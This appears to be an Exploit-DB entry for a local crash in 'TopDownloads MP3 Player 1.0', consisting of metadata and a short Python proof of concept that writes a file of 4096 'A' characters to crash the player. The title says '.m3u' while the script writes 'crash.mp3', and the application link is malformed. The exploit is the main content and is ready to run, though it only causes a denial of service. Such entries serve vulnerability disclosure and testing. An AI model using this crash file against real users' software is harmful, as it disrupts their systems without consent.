TopDownloads MP3 Player 1.0 - '.m3u' Crash
Author: l3D
type: dos
platform: windows
port:
date_added: 2010-03-06
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comtd-mp3.exe
#!/usr/bin/env python
#MP3 player 1.0 Local Crash
#Author: l3D
#Software Link: http://files.brothersoft.com/mp3_audio/players/td-mp3.exe
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
bad=open('crash.mp3', 'w')
bad.write('A'*0x1000)
bad.close()